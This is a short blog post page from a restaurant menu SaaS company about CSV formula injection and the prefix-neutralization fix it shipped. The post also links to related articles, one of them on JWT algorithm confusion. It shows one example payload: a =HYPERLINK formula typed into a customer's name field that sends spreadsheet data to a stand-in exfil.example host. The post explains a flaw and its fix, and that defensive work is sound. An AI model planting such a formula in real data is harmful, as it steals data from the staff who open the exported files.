industry2026-05-236 min read

When a customer types =HYPERLINK in their name: how CSV formula injection lets a Diamond user RCE your support engineer's spreadsheet

Name: thMenu
Rating: 4.9 (127 reviews)
Author: thMenu

Markus, finance ops in Stuttgart, opens the Monday-morning customer CSV; his browser flickers to an unknown domain for half a second, IT alert: "outbound blocked." Bilge from Konya had typed =HYPERLINK("http://exfil.example?d="&IMPORTRANGE(...), "Bilge") into her Supabase full_name three weeks earlier. PR #365 + #590 batch YY: shared csvField() prefix-neutralization.

thMenu Team

thmenu.com

Found this helpful? Share it.

X / Twitter LinkedIn

✦📈

industry

Why Digital Menus Increase Restaurant Revenue by Up to 30%

Studies show restaurants using digital QR menus see measurable increases in aver…

✦🔻

industry

When a Customer Downgrades, What Happens to Old Features? — The Silent Feature-Drift Problem in SaaS

Most SaaS apps run a single line of code when a customer downgrades — but old fe…

✦🛡️

industry

JWT alg-confusion attack — why Supabase's HS256 → RS256/JWKS migration breaks legacy verifiers

Verifiers that never decode the JWT header are wide open to `alg=none` and alg-c…

When a customer types =HYPERLINK in their name: how CSV formula injection lets a Diamond user RCE your support engineer's spreadsheet

Related articles

Why Digital Menus Increase Restaurant Revenue by Up to 30%

When a Customer Downgrades, What Happens to Old Features? — The Silent Feature-Drift Problem in SaaS

JWT alg-confusion attack — why Supabase's HS256 → RS256/JWKS migration breaks legacy verifiers